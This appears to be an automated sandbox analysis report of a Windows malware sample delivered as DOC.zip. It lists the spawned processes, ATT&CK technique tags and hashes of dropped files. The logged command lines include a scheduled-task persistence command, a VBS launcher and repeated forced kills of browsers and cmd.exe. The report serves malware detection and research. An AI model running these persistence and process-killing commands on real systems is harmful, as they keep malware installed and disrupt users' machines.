C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:14⤵PID:8
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:14⤵PID:1744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:14⤵PID:4492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 /prefetch:84⤵PID:3996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:1520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:14⤵PID:2308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:14⤵PID:772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5812 /prefetch:84⤵PID:1536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:14⤵PID:4468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5728 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:4272
-
-
-
C:\Windows\system32\timeout.exetimeout /t 93⤵
- Delays execution with timeout.exe
PID:3224
-
-
C:\Program Files\7-Zip\7z.exe"C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\Downloads\DOC.zip" -o"C:\Users\Admin\Downloads" -pFuckSyrialAndFreePsAndFreeSyria009633⤵
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\system32\timeout.exetimeout /t 93⤵
- Delays execution with timeout.exe
PID:4944
-
-
C:\Users\Admin\AppData\Local\Temp\Startup\DOC.exe"C:\Users\Admin\AppData\Local\Temp\Startup\DOC.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2080 -
C:\Users\Admin\AppData\Local\Temp\._cache_DOC.exe"C:\Users\Admin\AppData\Local\Temp\._cache_DOC.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:4032 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn MRIYKG.exe /tr C:\Users\Admin\AppData\Roaming\Windata\CHVALO.exe /sc minute /mo 15⤵
- System Location Discovery: System Language Discovery
PID:4496 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn MRIYKG.exe /tr C:\Users\Admin\AppData\Roaming\Windata\CHVALO.exe /sc minute /mo 16⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3156
-
-
-
C:\Windows\SysWOW64\WSCript.exeWSCript C:\Users\Admin\AppData\Local\Temp\MRIYKG.vbs5⤵
- System Location Discovery: System Language Discovery
PID:2420
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4840 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4940
-
-
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1708
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM iexplore.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3324
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM opera.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1244
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM safari.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2856
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM brave.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM vivaldi.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM epic.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4380
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM yandex.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM tor.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4944
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM CMD.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2984
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:436
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:3428
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3244
-
C:\Users\Admin\AppData\Roaming\Windata\CHVALO.exeC:\Users\Admin\AppData\Roaming\Windata\CHVALO.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1016
-
C:\Users\Admin\AppData\Roaming\Windata\CHVALO.exeC:\Users\Admin\AppData\Roaming\Windata\CHVALO.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4304
-
C:\Users\Admin\AppData\Roaming\Windata\CHVALO.exeC:\Users\Admin\AppData\Roaming\Windata\CHVALO.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3376
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
152B
MD5443a627d539ca4eab732bad0cbe7332b
SHA186b18b906a1acd2a22f4b2c78ac3564c394a9569
SHA2561e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9
SHA512923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d
-
Filesize
152B
MD599afa4934d1e3c56bbce114b356e8a99
SHA13f0e7a1a28d9d9c06b6663df5d83a65c84d52581
SHA25608e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8
SHA51276686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da
-
Filesize
5KB
MD583b94692368e4c0b438f2cfc7227df09
SHA1cd156c759146e8d0b3a486077818906692e64130
SHA2568767f64c018f7d6e0f8bf7d56bf1dc2ccefefc5c0d138603ddb207c241b31a1c
SHA51227400f61c43bb3e8cfc4bb3d520fd2ebab2ab9e571c16c292717e00ec5cf37e9738053ae2f3aea34bf97f4024a2b8f79c9127ac234f35444ff7721dd99cb7861
-
Filesize
6KB
MD5f807f73bb59ab5ac6a4db19465b16781
SHA1f73c06022f5b54b838ee01dd2fcbb1e0298edff1
SHA25631970231c598944c6d4d5c34bef84e00480b069c4d8926c873011a12c8afa2e0
SHA512c384c8976c1c9c01057e9b8b5ee151b787db893e6c089dd92206b76fd89d37186315060158d00f83ce6177165ba388fbafa13f7e663615d7e5d3c619b31f3845
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
10KB
MD589cc797640d44a2a7f2936d942779130
SHA1501dbfa2ebea0505e68895174db5110017957b82
SHA25680142692a53e1cfb016a8d2eef5229c8ae45102a1b7dadfe957001f7f027da82
SHA512f604e1577f236dab6c16143f7bd87d7c13241b00dc9e233129777af501ba7bcb23c32a4e689f34a469ec0ff5a7defeb78360233d92a04763482f5286f1d92d10
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
Filesize4KB
MD5612f522b415045e0ff10cda56eb3bdb1
SHA19f30356c67e4dfbd8b7fab6b0a1959664cf27cb1
SHA2560c42775f74555c61df0818a2ca2006e420282991ce34292247220e3cbd575dc9
SHA512e6075ca9ddcd068a4d362d1338ef98339168d6c1052c76a22e36718cd11cce192d9a649c78baeb9f8d646388eb4694732522e8ea892a42a0c50b4ad3bbe7bcb8
-
Filesize
944B
MD5ba169f4dcbbf147fe78ef0061a95e83b
SHA192a571a6eef49fff666e0f62a3545bcd1cdcda67
SHA2565ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1
SHA5128d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c
-
Filesize
944B
MD534f595487e6bfd1d11c7de88ee50356a
SHA14caad088c15766cc0fa1f42009260e9a02f953bb
SHA2560f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA51210976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b
-
Filesize
1KB
MD50f6a3762a04bbb03336fb66a040afb97
SHA10a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA25636e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69
-
Filesize
1KB
MD5f1c10b5a8a1723292d7f2497fc0ea413
SHA1d5008d39de67668cacf974188b9b2a03063a31c5
SHA256431bb1eb5470b7a2506e73760b9899a72889500004847f2c4d54fdea34562a73
SHA5127f1e237afc313b3cba6d1b612e28915398f2f82e915fc8bb751890a46b19842bfddc894674980f35d85d6003ba8d20798471b1d5e194a2fa95bb99c0a9a9fc00
-
Filesize
944B
MD5f4cd59fec6cf54c85fc53e911914bf82
SHA150c1bf0969af6099d4b602a1d923a9b693a9b9ff
SHA25670329406d55a7f671e2c30943772bfde19ceb53f7a402222aa0f74669f741f17
SHA5125cfc2de8d95b1670570908c65389391f107d0f023f8a92412f001bb61982301e3405b692390c502b3f302df907fa1231cd056863cc9151dbbdb59c579858d5dc
-
Filesize
944B
MD515dde0683cd1ca19785d7262f554ba93
SHA1d039c577e438546d10ac64837b05da480d06bf69
SHA256d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961
SHA51257c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672
-
Filesize
944B
MD5800b177dc8e90422f2d2b13672e3ab07
SHA11ecd97cc3aec28e977e8155f2356908b184f3146
SHA25624018c11408969d7b64c65a3b80cd4df17533d052b7557478006ea65ff497e6e
SHA5125d59c7357b0ce9b1ee7e339a4f370bf84640c2f1ed050b767f0f1e380f2a432dd375b801ee56dbd5c480738e77e0701606d1e8e338f33b1d8655c31bed8a0638
-
Filesize
935KB
MD5a1d37a2a0a4cd5038e129946ee935868
SHA187042fbecf1558a2e974c6ad045584f23e1ac7c9
SHA2569988b0297ad8be4bd3c559437176eaca54cdc36593728967395c4dee21fc898c
SHA512eb6cfcc7b1c526c06737dc6187af4f65bdd178ffc951cf8bb13571b44cc2c3c0cd051c6e9b4930433f8e6830420a04e0b538d353dd86a1fefb0663032c37c03c
-
Filesize
17KB
MD5e566fc53051035e1e6fd0ed1823de0f9
SHA100bc96c48b98676ecd67e81a6f1d7754e4156044
SHA2568e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15
SHA512a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04
-
Filesize
22KB
MD5e7a348fefbd177b76c61c052c4effe0e
SHA1fcf74b2b838432b60418f1df6b0e614e69b95aeb
SHA256c267698094cb719170bb7213b4ed4c59d0f1fc8ef9a9c4dabab1053a0d3c2dea
SHA51266664cc21e708a957f9dfa06b971de20620e27b92f52454fc3dfc7377ca134b028867fb338fc86029f9c778508aa4eceac620fc016bb3c8858340dbe16f53566
-
Filesize
1KB
MD545a66afa3b07b3143f0d0c3515898bae
SHA1cc5baf0c4d2fc0b034974786f20087e058915693
SHA2568a8c558b5cb169e5d2967dc3e69cb26174bdd8d457903f074477ef1c555b4fb6
SHA51204aee35c068225ec8982fc273fd4e4e172cf336b26561d5b8c7ccf3fe972c485b962d01bdcfab2a27fe456364114417dc3c44852d8431def9a04812e8008106f
-
Filesize
842B
MD56ebd7b6ae7b0ec775744d0bc88c1ee56
SHA127724aad404db1c8ad3b60bb675ad33ab97f24dd
SHA25658cc7247b20ae7b181bbf4f9078665a7989750c897d073d3d2f1227945e54fe6
SHA512e8e2996a6aa46733cd6973dd3b70be65df428ad413504892cbc4136fb5e458843ca928fc2b70ee3560855db3bea7b0a09fc07a1d17a3e7e4cb9c3225ddd803f3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.6MB
MD51d2237faf8e6198625010cb580280901
SHA1592449bddf763bb63c22f638cb42f71484f87f06
SHA25678643b903379276085c5ef0092afc5c10dee821c5754e01bc8ef835907b16ac4
SHA5128abe1ff967d92c663080caf54f315e534ea296c91474d66cd327dccc38a3aa8685101649bb120e28f1438011596dde4f2f83e8150c90d51529efce9906a5aa0b
-
Filesize
1.2MB
MD59353cd481543e4fcf91e2c770fbcfefb
SHA1a29a232bc73842cb11d87dc906747a55cc9ed27d
SHA2569c2ab47b11c7c94a4f2416030f6383b235baf30770881ba91e7d6534610a5cd5
SHA512827e1e0c0ed0b664b2232fc28444476a9f28f2df0ebe4638d93c183684b9fcdab26c26d5c1374146d8d50d13757408ceabc1ccffb616913cb8ced08dc0d2d3a2